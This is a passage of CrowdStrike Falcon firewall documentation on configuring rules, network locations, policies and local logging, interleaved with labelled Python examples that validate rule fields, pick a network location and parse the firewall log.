  5. To configure a rule for executables with dynamic file paths, include a wildcard in the Executable Filepath field. To confirm that the wildcard works as expected, enter a URL in the Test String field.

  6. Click Add rule.

Edit a rule

You can edit all existing firewall rule parameters. Review firewall rule versions and rule IDs for information about what changes when edits are made.

  1. Go to Endpoint security > Firewall > Rule groups and click the name of the rule group to view its details.

  2. On the Rules tab, click the open menu icon of the rule you want to edit.

  3. Click Edit rule to see and edit the rule.

  4. Make your changes in the firewall rule dialog fields and click Save. For more info, see Firewall rule dialog fields.

Firewall rule dialog fields

Name: Give this Firewall rule a name that is recognizable when viewing rules in Firewall Rule Groups and Firewall Policies.

Description (optional): Enter information such as the rule’s purpose.

Address Type: Select an option:

  • FQDN: Allows you to list one or more fully qualified domain names (FQDN) in the Remote Address field. FQDNs can be used only for outbound rules. Inbound and bidirectional rules are not supported. URLs containing subdirectories, for example testing.com/api, are not supported.

    • Wildcard FQDNs, for example *.zoom.us, are supported using glob syntax. For more information, see Glob Syntax.

    • Enter a desired FQDN in the FQDN to Test Against Above Pattern (Optional) field and click Test.

    • Examples of valid FQDNs:

      • www.example.com

      • example.com

      • abc.def.example.com

      • [a-z]xample.com

    • Examples of invalid FQDNs:

      • example.com/api

      • exa**mple.com

    • www.example.com and example.com may resolve to two different IP addresses. To ensure that both FQDNs are included in your rules, we recommend creating two rules, one for *.example.com and one for example.com.
      • When two distinct FQDNs resolve to the same IP address, blocking one FQDN automatically blocks the other. For example, if www.example1.com and www.example2.com resolve to the same IP address, creating an FQDN rule to block www.example1.com will also block www.example2.com.
    • While the use of FQDN-based rules is generally reliable, due to the nature of the network protocols involved, it isn't possible to guarantee that FQDN rules cannot be circumvented in all cases.
      • If absolute certainty is required, rules should be alternatively configured by IP address, or restricted by policies, to ensure internet traffic cannot be proxied and that DNS resolution cannot be circumvented.
    • FQDN rules may not work if your browsers have Secure DNS/DNS over HTTPS enabled. For information on how to disable Secure DNS/DNS over HTTPS, see documentation for Microsoft Edge, Chrome and Firefox.
Note: FQDN is not supported for Linux.
  • IP address: Allows you to list one or more IP addresses in the Local Address and Remote Address fields.

Platform: Windows, macOS, and Linux

Address Family: Your selection determines how address formats you enter in the Local Address and Remote Address fields are parsed and validated.

  • If you are creating a rule that defines addresses, select the address family you’re using:

    • IPv4

    • IPv6

  • Select Any if you’re creating a rule for ports only, with IP address type, or with FQDNs only, with FQDN address type. Any rules will apply to both IPv4 and IPv6 traffic.

Protocol: Define network protocols. You can select multiple options:

  • Any

  • TCP

  • UDP

  • ICMPv4

  • IGMP

  • IP-in-IP

  • IPv6 Encapsulation

  • GRE

  • ICMPv6

    Note: macOS doesn't have visibility into and cannot block SSH connections.

  • Advanced

    When you select Advanced, the Protocol Number field is made available so you can enter the next level protocol, also known as the transport layer protocol:

    • IPv4: Protocol field

    • IPv6: Next Header field

    See the Internet Assigned Numbers Authority's (IANA) official list of protocols: iana.org

Note: IGMP, IP-in-IP, IPv6 Encapsulation, and GRE are not supported for Linux.

Local Address and Remote Address: Enter the local IP addresses and remote IP addresses the rule will match, if any. Related Firewall Events report the exact address involved in the connection that matches the rule. The Local Address and Remote Address fields support the same values.

Note: On Mac hosts, Outbound or Both rules applied to outbound traffic will not apply based on the local IP because macOS hosts always report the local IP address as 0.0.0.0 or NULL.
Important: When IP address is selected for Address Type, every address defined in these fields must be either IPv4 OR IPv6, matching the protocol selected in Address Family for this rule.
  • IPv4: Define using one of these formats:

    • A single IP address

    • Commas and hyphens

      • Semicolons can be used to separate individual IP addresses and ranges (limited to 1,000 identified addresses)

    • CIDR notation with a network prefix as a single integer from 1-32, inclusive

  • IPv6: Define a single IP address, or use CIDR notation with a network prefix as a single integer from 1-128, inclusive, to define an address range

  • Examples of acceptable address ranges:

    • 192.168.0.0/8

    • 10.0.2-4.30,220-224

    • fe80::a8bb:ccff:fedd:eeff

    • 1022::beef:168:aa30:a09/120

    • 5aef:2b::8/112

    • ::1

  • Example of a range that would be rejected:

    • 192.168.1-254.1-254

Local Port and Remote Port: Enter the local ports and remote ports the rule will match, if any. Format the Local Port and Remote Port fields using these supported parameters:

  • Single port value: Define with an integer from 1 to 65535.

  • Ranges of port numbers: Define using a hyphen. For example, 3000-4000.

  • Combinations of single values and ranges in a single rule: Define using an array. For example, 22, 80-88.
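
The address, port, and FQDN field formats described above, as an added example (not CrowdStrike code): a validator that expands the comma/hyphen octet syntax, enforces the 1,000-address limit and the CIDR prefix bounds, parses port arrays, and stands in for the FQDN test feature with Python's fnmatch. Assumptions, also marked in the code: a CIDR block counts as one entry towards the limit (the page accepts 192.168.0.0/8), and the console's glob `*` and `[a-z]` behave like fnmatch's.

```python
"""Validate firewall rule address, port and FQDN fields as the page documents them."""
from __future__ import annotations

import ipaddress
import re
from fnmatch import fnmatchcase

MAX_ADDRESSES = 1000  # limit on identified addresses per field, from the page
_PORT_RE = re.compile(r"^(\d+)(?:-(\d+))?$")


def _expand_octet(expr: str) -> list:
    """Expand one IPv4 octet expression such as '30,220-224' into its values."""
    values = []
    for part in expr.split(","):
        lo, _, hi = part.partition("-")
        lo_i, hi_i = int(lo), (int(hi) if hi else int(lo))
        if not 0 <= lo_i <= hi_i <= 255:
            raise ValueError(f"octet out of range: {part!r}")
        values.extend(range(lo_i, hi_i + 1))
    return values


def validate_address_field(value: str, family: str) -> int:
    """Validate a Local/Remote Address value for Address Family 'IPv4' or 'IPv6'
    and return how many addresses it identifies. Entries are ';'-separated.
    Assumption: a CIDR block counts as one entry (the page accepts 192.168.0.0/8),
    while comma/hyphen octet ranges are expanded and capped at MAX_ADDRESSES."""
    version, max_prefix = (4, 32) if family == "IPv4" else (6, 128)
    total = 0
    for entry in filter(None, (e.strip() for e in value.split(";"))):
        if "/" in entry:
            net = ipaddress.ip_network(entry, strict=False)
            if net.version != version or not 1 <= net.prefixlen <= max_prefix:
                raise ValueError(f"bad {family} CIDR: {entry!r}")
            total += 1
        elif version == 4:
            octets = entry.split(".")
            if len(octets) != 4:
                raise ValueError(f"bad IPv4 entry: {entry!r}")
            count = 1
            for octet in octets:
                count *= len(_expand_octet(octet))
            total += count
        else:
            if ipaddress.ip_address(entry).version != 6:
                raise ValueError(f"bad IPv6 entry: {entry!r}")
            total += 1
    if total > MAX_ADDRESSES:
        raise ValueError(f"{total} addresses identified; limit is {MAX_ADDRESSES}")
    return total


def is_valid_address_field(value: str, family: str) -> bool:
    """True when validate_address_field accepts the value."""
    try:
        validate_address_field(value, family)
    except ValueError:
        return False
    return True


def validate_port_field(value: str) -> list:
    """Parse a Local/Remote Port value such as '22, 80-88' into (low, high) pairs."""
    ranges = []
    for part in filter(None, (p.strip() for p in value.split(","))):
        m = _PORT_RE.match(part)
        if not m:
            raise ValueError(f"bad port entry: {part!r}")
        lo, hi = int(m.group(1)), int(m.group(2) or m.group(1))
        if not 1 <= lo <= hi <= 65535:
            raise ValueError(f"port out of range: {part!r}")
        ranges.append((lo, hi))
    return ranges


def fqdn_matches(pattern: str, fqdn: str) -> bool:
    """Stand-in for the console's 'FQDN to Test Against Above Pattern' check.
    Rejects the documented invalid forms (a path, '**'), then matches the glob
    case-insensitively with fnmatch. Assumption: the console's glob '*' and
    '[a-z]' behave like fnmatch's."""
    if "/" in pattern:
        raise ValueError("paths such as example.com/api are not supported")
    if "**" in pattern:
        raise ValueError("'**' is not valid in an FQDN pattern")
    return fnmatchcase(fqdn.lower(), pattern.lower())


if __name__ == "__main__":
    # Constructed values taken from the page's own examples.
    print(validate_address_field("10.0.2-4.30,220-224", "IPv4"))  # 18
    print(is_valid_address_field("192.168.1-254.1-254", "IPv4"))  # False: 64516 > 1000
    print(fqdn_matches("*.example.com", "example.com"))          # False
```

The last call shows why the page recommends a second rule for the bare domain: `*.example.com` does not match `example.com`.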

Action to Take: Select an option:

  • Allow: Defined network connections are permitted

  • Block: Defined network connections are denied

Direction: Select an option:

  • Inbound: Rule will apply to network traffic from the Remote Address/Port to the Local Address/Port.

  • Outbound: Rule will apply to network traffic from the Local Address/Port to the Remote Address/Port.

  • Inbound and outbound: Rule will apply to all network traffic between the Remote Address/Port and the Local Address/Port.

Network Locations: Specify the Windows network location profiles where this firewall rule should be applied:

Note: Domain, private, and public locations are only available for Windows users.
Note: Network location is not supported for Linux.

Executable Filepath (optional):

Use this field to create a process-specific firewall rule. For example, this can be useful if you need to allow a program in a certain folder access to a port that is blocked to all other traffic by another firewall rule. When this field is blank the rule is applied for all processes. Your input must adhere to the following guidelines.

Note: Executable filepath is not supported for Linux.
Note: Multiple file paths within a single firewall rule are not supported. Create separate firewall rules for different file paths.

For static file paths:

  • It must include a drive letter such as C: or D:

  • One of the two special names:

    • %SystemRoot% usually means C:\windows

    • %SystemDrive% usually means C:

  • This field does not support ping.exe

  • The value can also be a fully specified UNC path for network locations, such as: \\server\share\file\to\path.exe

    Note: If the sensor can’t resolve the drive letter entered in this field when the rule is enforced, it reports a FirewallRuleApplicationFailed event in Endpoint security > Firewall > Activity.

For dynamic file paths:

  • Include glob syntax to create a wildcard rule for a dynamic file path. For more info, see Glob Syntax.

  • Do not include a drive letter such as C: or D:

Example file paths by type:

Dynamic file path

Mac:

  • /Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/*/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper

Windows:

  • **\Program Files\Microsoft Office\root\Office*\*.exe

Static file path

Mac:

  • /Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/103.0.5060.53/Helpers/Google Chrome Helper.app/Contents/MacOS/Google Chrome Helper

Windows:

  • C:\Program Files\Google\Chrome\Application\chrome.exe

  • %SystemRoot%\System32\cmd.exe

Note: Enclose individual bracket characters ( [ or ] ) in the input field inside of additional square brackets.

Test String (optional):

This case-sensitive field appears when the system detects glob syntax in the Executable Filepath field. To confirm that the wildcard works as expected, enter sample URLs.

Service Name (optional): Enter a specific service name for the rule to match. This is converted to a Service SID, which Windows Filtering Platform can match. When this field is blank the rule is applied for all services.

Watch Mode: Select this option to see the events associated with this rule in Endpoint security > Firewall > Activity. You might want to use this setting for troubleshooting, testing a newly added firewall rule, or monitoring a critical firewall rule.

Note: Turn on watch mode to report events associated with the rule. When watch mode is enabled, one event per hour is viewable for the rule.

Configure firewall rules for domain controller

See Microsoft’s documentation for more information about defining rules for domain controllers.

Custom network locations for Falcon Firewall Management rules

Falcon Firewall Management enables you to configure custom network locations for firewall rules in the Falcon Console. This allows you to apply specific rule sets to each host based on their location. The sensor uses these network location definitions to automatically determine which location to activate and enforces the firewall rules associated with that location.

Windows Falcon Firewall Management also supports the following native network profiles:

  • Domain

  • Private

  • Public

Note: If there is no custom network location applied to a Windows host’s network interface, Falcon Firewall falls back to native profiles.
Note: Network locations are not supported for Linux.

You can set up custom network locations for each network interface on Windows hosts, which allow for multiple network locations to be active on a single computer. For example, you might apply more strict rules for traffic routing through Wi-Fi and more relaxed rules for traffic routing through the Ethernet adapter. This per network-interface application of custom network locations is similar to how domain, public and private profiles apply to Windows computers.

Note: For macOS, a single network location will apply across the entire computer, whereas Windows network locations will apply per host network interface.

You can configure multiple criteria per network location and link them to Firewall rules. There are five passive criteria that can instantly detect changes to endpoint and/or network configuration.

Criteria

Connection type & SSID

Checks for wired or wireless connection and optionally determines if a wireless connection is encrypted and/or identified by a known SSID.

Gateway IP address

Checks the IP address of the host’s network gateway.

DHCP server address

Checks the IP address of the host’s DHCP server.

DNS server address

Checks the IP address of the host’s DNS servers.

Host IP address

Checks the IP address assigned to the host.


Custom network location options

There are three active criteria available that cause the Falcon Sensor to probe your network for certain conditions. These probes are triggered whenever the Falcon Sensor detects changes in the network configuration or at regular polling intervals set by you. The polling interval you choose for each active criteria is applied across all network locations for that criteria. For example, all network locations in your CID that use a DNS resolution test will use the same polling interval.

Note: These criteria detect changes asynchronously, and there may be a noticeable delay in evaluating a new location.
Criteria

Ping test

Tests domain names or IP addresses for response to a ping request.

DNS resolution test

Tests whether the domain names can be resolved by the host. Optionally, you can provide the IP addresses you expect.

HTTPS certificate test

Tests whether the domain names can be reached using HTTPS. Optionally, specify a port using the standard notation as defined in RFC 2396, such as internal-service.company.com:8000. The server must be using a valid SSL certificate trusted on the host. Untrusted self-signed certificates are rejected.

The criteria for HTTPS certificates are supported on Windows 7, as well as Windows 10 v1703 (Redstone 2) and later.

We recommend you use the active criteria sparingly or consider lengthening the time between polling to prevent excessive system load. Also, keep in mind that Ping, DNS resolution, and HTTPS certificate tests are asynchronous and won’t detect changes instantly.

For example, you may want to create a network location to detect whether the host is on the company VPN to allow access to various resources on the company network. If you have a DNS server located at an IP address of 123.1.1.2 that is assigned to the host only when it is on the VPN, you can create a network location and add a criteria for that DNS server address. Then that network location becomes active when the host is on the VPN. Then you can add that network location to a Firewall rule that only activates when the VPN is connected. This approach provides instant detection of location changes and creates less load on your network.


DNS server location configuration

Alternatively, if you have an internal domain that is only reachable through a VPN and has an HTTPS certificate signed by a trusted Certificate Authority (CA), such as intranet.company.local, you can create a network location using the HTTPS certificate criteria. That network location becomes active when intranet.company.local is reachable through the VPN and has an HTTPS certificate signed by a trusted CA. You can then add that network location to a Firewall rule that only activates when the VPN is connected and intranet.company.local is reachable with a valid SSL certificate. While this approach provides stronger security against potential spoofing, it creates more load on your network and may not apply instantly because it is asynchronous.


HTTPS certificate location configuration

When more than one network location is detected, the one with the highest precedence is activated. To reorder them, click Edit precedence then drag and drop them directly in the list.
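
The location selection described in this section, as an added example (not Falcon sensor code): each enabled location's passive criteria are checked against a constructed snapshot of an interface, and when several locations match, the one highest in precedence is activated. The location names, addresses and criteria values are constructed, except for the page's VPN DNS server example; the active probes (ping, DNS resolution, HTTPS certificate) are left out because they need network access, and it is an assumption that all criteria on a location must hold together.

```python
"""Select the active custom network location from an interface snapshot: each
enabled location's passive criteria are checked and, when several locations
match, the highest-precedence one (first in the list) is activated.
Added example, not Falcon sensor code."""
from __future__ import annotations

import ipaddress
from dataclasses import dataclass
from typing import Callable, Dict, Optional, Sequence, Tuple


@dataclass(frozen=True)
class InterfaceState:
    """Constructed snapshot of one interface's passive attributes."""
    connection: str = "ethernet"      # "ethernet" or "wireless"
    ssid: str = ""
    gateway: str = ""
    dhcp_server: str = ""
    dns_servers: Tuple[str, ...] = ()
    host_ips: Tuple[str, ...] = ()


@dataclass
class Location:
    name: str
    criteria: Dict[str, Tuple[str, ...]]  # criterion name -> accepted values
    enabled: bool = True


def _in_blocks(ips: Tuple[str, ...], blocks: Tuple[str, ...]) -> bool:
    """True when any host IP falls inside any of the given IPs or CIDR blocks."""
    return any(ipaddress.ip_address(ip) in ipaddress.ip_network(b, strict=False)
               for ip in ips for b in blocks)


# The page's five passive criteria. The active probes (ping, DNS resolution,
# HTTPS certificate) need network access and are left out here.
CHECKS: Dict[str, Callable[[InterfaceState, Tuple[str, ...]], bool]] = {
    "connection_type": lambda s, want: s.connection in want,
    "ssid": lambda s, want: s.connection == "wireless" and s.ssid in want,
    "gateway": lambda s, want: s.gateway in want,
    "dhcp_server": lambda s, want: s.dhcp_server in want,
    "dns_server": lambda s, want: any(d in want for d in s.dns_servers),
    "host_ip": lambda s, want: _in_blocks(s.host_ips, want),  # IPs or CIDR blocks
}


def location_matches(loc: Location, state: InterfaceState) -> bool:
    """Assumption: every criterion configured on a location must hold."""
    return all(CHECKS[name](state, want) for name, want in loc.criteria.items())


def active_location(locations: Sequence[Location], state: InterfaceState) -> Optional[str]:
    """locations must be in precedence order; the first enabled match wins."""
    for loc in locations:
        if loc.enabled and location_matches(loc, state):
            return loc.name
    return None


# Constructed locations in precedence order, the page's VPN DNS example first.
# An SSID is easy to spoof (as the page notes), so the Wi-Fi location is last.
LOCATIONS = [
    Location("Corporate VPN", {"dns_server": ("123.1.1.2",)}),
    Location("Office LAN", {"gateway": ("10.0.0.1",), "host_ip": ("10.0.0.0/16",)}),
    Location("Home Wi-Fi", {"connection_type": ("wireless",), "ssid": ("HomeNet",)}),
]
```

A host on home Wi-Fi with the VPN up matches both "Home Wi-Fi" and "Corporate VPN"; precedence makes the VPN location win, so its rules, not the Wi-Fi rules, are enforced.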

Configure a custom rule

Follow these steps to configure a custom firewall rule for macOS.

  1. In the console, go to Endpoint security > Firewall > Network locations.

  2. Click Create network location.

  3. Enter a location name and description.

  4. Click Create location.

  5. (Win and macOS only) In the network location builder, click to select the criteria to use.

    • If you select Connection type & SSID, you can choose wireless or ethernet. When you select wireless, you’ll have the additional option of limiting the criteria to encrypted networks and/or SSIDs.

      Note: SSIDs are easily spoofed and are therefore a less secure option.
      Note: For endpoints running Windows 11 version 24H2 build 26100 and later, location services must be enabled for all services on the endpoint to use the Connection Type & SSID criteria due to a Microsoft bug. For more info, see our knowledge article, Windows 11 version 24H2 build 26100 impacts Falcon Firewall custom network locations. For US-GOV-1 and US-GOV-2 customers, see Windows 11 version 24H2 build 26100 impacts Falcon Firewall custom network locations.
      Note: For endpoints running macOS Sonoma 14 and later, if the Connection Type & SSID criteria is added to a Firewall policy, the endpoint will receive an OS prompt asking the user to grant Falcon access to location permissions. For more info, see our knowledge article Tech Alert | Falcon Firewall SSID network location criteria cannot be resolved on macOS 14. For US-GOV-1 and US-GOV-2 customers, see Tech Alert | Falcon Firewall SSID network location criteria cannot be resolved on macOS 14.
    • For Gateway IP address, DHCP server address or DNS server address, enter the network addresses (IPv4 or IPv6) to use. For Host IP address, network addresses can be IPv4, IPv6, or CIDR blocks.
    • When you select the DNS resolution test, you’ll be prompted to enter a domain name and set the polling interval. Optionally, you can configure the IP addresses to expect.

      Note: If the resolved IP addresses do not match any of the expected IP addresses you provided, the criteria will fail even if the domain name can be resolved.
    • For the HTTPS certificate test criteria, you’ll be prompted to enter a domain name and set the polling interval. You can also set a TCP port, such as company.com:8000.

    • To configure the Ping test criteria, enter the domain names or IP addresses to target with an ICMP request and set the polling interval.

      Note: This criteria uses ICMP protocol.

  6. After you’ve configured your network locations, click Save.

  7. To enable this location, select Enable location from the Action dropdown menu.

Your custom locations are available in the Create a rule group modal.

To duplicate or delete a custom network location, go to Endpoint security > Firewall > Network locations. Then click to open the location and select Duplicate location or Delete location from the Action dropdown menu.

Add a custom network location to a rule

Once created, you can add the custom network location to new and existing rule groups. You can add multiple locations to a single firewall rule. Go to the Endpoint security > Firewall > Rule groups page. Then follow the steps to create or edit a firewall rule. For more info, see Create a firewall rule or Edit a rule.


Add custom network location to a rule
Note: Domain, private, and public network locations are only available for Windows users. macOS users will not see those locations in the drop-down list under Network Location. Network locations are not supported for Linux.

Unexpected behavior may occur if you activate a firewall policy enabled with network locations on a sensor that does not have this feature. We recommend configuring separate firewall policies, rule groups, and host groups for hosts that use firewall network locations.

Firewall Rule ID and versions

When new firewall rules are created, they are automatically assigned a unique Rule ID and Version. These attributes are both available on the Rules tab of the Rule group details and in the details of all firewall events shown in Endpoint security > Firewall > Activity.

A firewall rule’s Rule ID always stays the same. When rules are copied, the copies of the rules each get their own unique Rule ID.

A rule’s Version number changes each time it’s edited. This makes it possible to distinguish firewall events from different versions of the same rule. From the details panel of any firewall event, click the Rule Name or Rule Version to go to the parameters defined in the specific version of the rule that triggered the event.

Firewall rules precedence

Firewall rules are processed according to precedence (sequential order) within their rule groups, so it is important to consider this when configuring a group. For example, strict rules should have a higher precedence than generic rules. You can reorder rules on the Rules tab of a Rule group details page.

  1. Go to Endpoint security > Firewall > Rule groups and click the edit icon for a rule group.

  2. Click Edit precedence to activate the drag and drop arrow controls.

  3. Drag and drop the arrows to change the precedence order of your rules.

  4. Click Save.

Enable or disable firewall rule groups and rules

Like policies, rule groups and the rules within them must be enabled for them to take effect on hosts.

Enable or disable rule groups

Enable or disable a rule group from the rule group's details page.

  1. Go to Endpoint security > Firewall > Rule groups.

  2. Click the name of the rule group to view its details.

  3. Click Enable/Disable to update the rule group status.

Enable or disable rules

Enable or disable an individual rule from the Rules tab of a rule group's details page.

  1. Go to Endpoint security > Firewall > Rule groups and find the rule you want to enable or disable.

  2. Click the open menu icon

  3. Click Edit firewall rule.

  4. In the dialog, click Enable/Disable to update the rule status.

Delete firewall rule groups

Delete a firewall rule group you no longer need.

  1. Go to Endpoint security > Firewall > Rule groups.

  2. Click the Mac, Windows, or Linux tab to find the rule group you want to delete.

  3. Click the name of the rule group you want to delete.

  4. Click Delete.

Delete firewall rules

Delete firewall rules you no longer need from the Rules tab of a rule group page.

  1. Go to Endpoint security > Firewall > Rule groups.

  2. Click the Mac, Windows, or Linux tab to find the rule group that includes the rule you want to delete.

  3. Click the name of the rule group that includes the rule you want to delete.

  4. On the Rules tab, click the open menu icon of the rule you want to delete.

  5. Click Delete.

Troubleshoot rule enforcement for macOS endpoints

If, after you’ve completed configuration and testing, your firewall rules aren’t enforced as you expected, confirm the following Requirements and Configure firewall policy settings:

  • macOS version is Big Sur 11.4 or later

  • sensor version 6.33 or later is loaded and running

  • macOS sensor version 6.41 or later is loaded and running for wildcard support

  • Windows sensor version 6.42 or later is loaded and running for wildcard support

  • the sensor received an updated firewall policy or rule for macOS

  • Enforce policy is enabled at the policy level

  • Monitor mode is disabled

Note: There is a known Apple network extensions issue that can cause TCP SYN packets to not be blocked. If this is a concern for you, file a ticket with Apple and mention feedback ticket FB14771319 - "Kernel leaks TCP SYN packet (and IP address) when flow is denied by NEFilterDataProvider."

Audit changes to firewall rules and rule groups

CrowdStrike automatically audits all changes to firewall rules and rule groups. There are two types of audit logs available to view changes to your firewall rules:

  • Full revision history of every firewall rule and rule group: On the Firewall rule groups page, click See audit log.

  • Revision history of firewall rules within a specific rule group: Go to the firewall rule group’s details page and click the Audit log tab.


Audit log page

Filter columns to group your view of the log. Logged revisions are defined in the Action column as Created, Updated, or Deleted.

Click any revision to see its Details panel:

  • For updates to rule groups, the revision’s details include whether it was enabled or disabled.

  • When individual rules have been updated, see the detailed changes that were made.

Manage your firewall policies

Use firewall policies to apply the rules in your firewall rule groups to your hosts. You can have a total of 100 firewall policies, including the Default Policy.

About Falcon policies

A policy is a collection of settings. Falcon includes many types of policies for specific purposes: prevention policies, sensor update policies, and more. All policies work the same way:

  1. Create the policy and configure its settings

  2. Assign the policy to one or more host groups

  3. Falcon applies the policy settings to each host based on its host group membership and policy precedence

If a host doesn't belong to any host groups assigned to a policy, it automatically uses the settings defined in the default policy.

View your firewall policies

Go to Endpoint security > Firewall > Policies to see your firewall policies. Click the name of the policy to view its details.


Firewall policies page

Click the name of a firewall policy to see details and edit an individual policy.

Policy details are configured and displayed on four tabs:

  • Settings: Where to define whether and how the policy is applied to assigned host groups.

  • Assigned Host Groups: Where to define which host groups will use the settings of the policy if it is enforced.

  • Assigned Rule Groups: Where to assign the firewall rule groups to the policy, and the order in which they are enforced.

Create a firewall policy

Create your organization’s firewall policies to enforce your firewall rules on host groups.

  1. Go to Endpoint security > Firewall > Policies and click Create policy.

  2. Enter a name, description and platform, and then click Create policy.


    Create policy dialog
  3. There are two options to start a new firewall policy. Start from scratch or duplicate an existing policy.

    • Empty Policy makes a new policy that contains no rule groups.

    • Duplicate an existing policy copies one of your firewall policies with all of its assigned rule groups (but not host groups). Select one of your policies and click Duplicate.

  4. Your firewall policy is created

Assign firewall rule groups to a firewall policy

Add firewall rule groups to your organization’s firewall policies so you can enforce your firewall rules on host groups.

  1. Go to Endpoint security > Firewall > Policies and click the name of the policy you want to assign rules groups to.

  2. Go to the firewall policy’s Assigned rule groups tab, and click Assign rule group.

  3. In the Assign firewall rule groups to policy dialog, select rule groups, and click Assign groups.

  4. Your selections are added to the list of Assigned rule groups in the position of lowest precedence.

Note: Assigning a rule group to a policy does not change the rule group’s enabled or disabled status.

Edit firewall rule group precedence in a firewall policy

Firewall rule groups are processed according to precedence within the firewall policies they’re assigned to, so it’s important to consider this when configuring a policy. For example, rule groups with strict rules should have a higher precedence than more generic rule groups.

Reorder rule group precedence on a policy’s Assigned rule groups tab.

  1. Go to Endpoint security > Firewall > Policies and then click the policy name to view the policy details.

  2. Click Edit precedence to activate the drag and drop arrows.

  3. Drag and drop the arrows to change the precedence order of your rule groups.

  4. Click Save.

Remove a firewall rule group from a firewall policy

You can remove firewall rule groups from firewall policies. This does not delete the firewall rule group or the rules with it.

  1. Go to Endpoint security > Firewall > Policies and click the name of the policy to view its details.

  2. Go to the firewall policy’s Assigned rule groups tab.

  3. Click Remove from policy.

Configure firewall policy settings

Use the Settings tab of an individual firewall policy to configure whether and how the policy is applied. Go to Endpoint security > Firewall > Policies and click the name of the policy to view its details.


Screenshot of firewall policy, settings tab

Firewall policy enforcement and monitoring

  • Enforce Policy: Turn on this setting to apply the policy’s rules on the hosts in the assigned host groups. This disables the hosts’ OS firewall rules and overrides the firewall settings.

    • Windows

      This disables the Windows hosts’ OS firewall rules. Falcon’s firewall rules take full precedence over the existing Windows firewall settings of the individual hosts in the assigned host groups. Any Windows firewall settings, such as those created using Windows group policies, remain on the system but do not function.

    • macOS

      When the CrowdStrike Firewall is enforced on macOS hosts, it doesn’t override the OS firewall but works alongside it. As a result both firewalls can be active simultaneously. Both firewalls must be configured to allow for given traffic in order for it to flow. The OS firewall takes action first, so if the OS firewall blocks a piece of network traffic first, the Falcon Firewall won’t have visibility.

      For example, if the macOS firewall is configured to allow, and the CrowdStrike Firewall is configured to block, the block occurs. If the macOS firewall is configured to block, and the CrowdStrike Firewall is configured to allow, the connection is blocked.

    • Linux

      When the CrowdStrike Firewall is enforced on Linux hosts, it does not change the configuration of any Linux firewalls and is compatible with them. As a result, CrowdStrike firewall works with existing firewall solutions on the host simultaneously. Similar to macOS, the ordering of different firewalls is not guaranteed.

  • Monitor Mode: Temporarily turn on this setting to allow traffic that would normally be blocked by the policy and report all associated events in Endpoint security > Firewall > Activity, where the Action taken for these events is labeled Would be blocked.

    Note: During testing, if the noise is too high, or you need to determine whether the firewall events you’re seeing are from a firewall rule or a default traffic rule, temporarily set the default traffic rules to Allow All. Remember to switch them back to the desired setting when you finish testing and disable Monitor Mode.

  • Local Logging (Windows, macOS, and Linux): Turn on this setting to record all traffic that matches rules assigned to this policy. When enabled, it creates a CSV formatted log file with the base name hbfw.log on the host at %SystemRoot%\System32\Drivers\CrowdStrike\ for Windows and at /Library/Application Support/CrowdStrike/Falcon/ for macOS, and with the base name falcon-hbfw.log at /var/log on the host for Linux. Each log file is limited to 5 MB. Up to the 5 most recent log files are stored on the host.

    • The log file contains the following information for each record:

      • Time stamp (UTC)

      • Rule Version

      • Action

      • Direction

      • Local Address

      • Local Port

      • Remote Address

      • Remote Port

      • Profile (unknown for macOS and Linux)

      • Image File Name

      • UPID

      • PID

      • User Name (unknown for macOS)

      • FQDN

      Note: Image File Name, UPID, PID, User Name, and FQDN are not supported for Linux.

    • For macOS, when a network location change is detected, a new row is added to the local log to indicate the change with the following information:

      • Time stamp (UTC)

      • Location

      • Interface

      • Network Location ID

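
To turn the local log into something reviewable, here is an added Python example (not CrowdStrike's code) that parses hbfw.log records and summarizes blocked and would-be-blocked traffic. It assumes the CSV columns appear in the order of the field list above and that the macOS location-change row has the four documented columns; the sample records are constructed, not captured from a host, and the action labels Blocked and Would be blocked are borrowed from the console wording, so check both the column order and the labels against a real log file before relying on the filters.

```python
"""Parse Falcon Firewall local log (hbfw.log / falcon-hbfw.log) records.

Added example, not CrowdStrike code. The column order is an assumption taken
from the documented field list; verify it against a real log before use.
"""
import csv
import io
from collections import Counter

# Assumed column order: the documented field list, in the order it is given.
TRAFFIC_FIELDS = [
    "timestamp", "rule_version", "action", "direction",
    "local_address", "local_port", "remote_address", "remote_port",
    "profile", "image_file_name", "upid", "pid", "user_name", "fqdn",
]

# macOS adds a row on network location change (assumed column order as documented).
LOCATION_FIELDS = ["timestamp", "location", "interface", "network_location_id"]

# Constructed sample log (not captured from a real host). It mixes traffic rows
# with one macOS-style location-change row so both shapes are exercised.
SAMPLE_LOG = """\
2024-05-01T12:00:01Z,17,Blocked,In,10.0.0.5,445,10.0.0.99,51234,Domain,System,4,4,NT AUTHORITY\\SYSTEM,host1.example.local
2024-05-01T12:00:02Z,17,Allowed,Out,10.0.0.5,51235,10.0.0.2,53,Domain,C:\\Windows\\System32\\svchost.exe,812,812,NT AUTHORITY\\NETWORK SERVICE,host1.example.local
2024-05-01T12:00:03Z,17,Would be blocked,Out,10.0.0.5,51236,203.0.113.7,22,Domain,C:\\Users\\alice\\tool.exe,9001,9001,EXAMPLE\\alice,host1.example.local
2024-05-01T12:00:04Z,Office,en0,6
2024-05-01T12:00:05Z,17,Blocked,In,10.0.0.5,3389,198.51.100.9,40000,Domain,System,4,4,NT AUTHORITY\\SYSTEM,host1.example.local
"""


def parse_hbfw_log(text):
    """Parse CSV records into dicts, classifying each row by its column count."""
    records = []
    for row in csv.reader(io.StringIO(text)):
        if not row:
            continue
        if len(row) == len(TRAFFIC_FIELDS):
            rec = dict(zip(TRAFFIC_FIELDS, row), kind="traffic")
        elif len(row) == len(LOCATION_FIELDS):
            rec = dict(zip(LOCATION_FIELDS, row), kind="location_change")
        else:
            # Unexpected shape (a platform that omits columns, a truncated line): keep it raw.
            rec = {"kind": "unrecognized", "raw": row}
        records.append(rec)
    return records


def count_blocks(records):
    """Count Blocked and Would-be-blocked traffic rows per (action, direction, remote endpoint)."""
    counts = Counter()
    for rec in records:
        if rec["kind"] == "traffic" and rec["action"] in ("Blocked", "Would be blocked"):
            counts[(rec["action"], rec["direction"], rec["remote_address"], rec["remote_port"])] += 1
    return counts


def blocked_inbound_local_ports(records):
    """Local ports on which inbound traffic was blocked (confirms a Block All inbound default)."""
    ports = {int(r["local_port"]) for r in records
             if r["kind"] == "traffic" and r["direction"] == "In" and r["action"] == "Blocked"}
    return sorted(ports)


def monitor_mode_candidates(records):
    """Executables whose traffic would start being blocked once Monitor Mode is switched off."""
    return sorted({r["image_file_name"] for r in records
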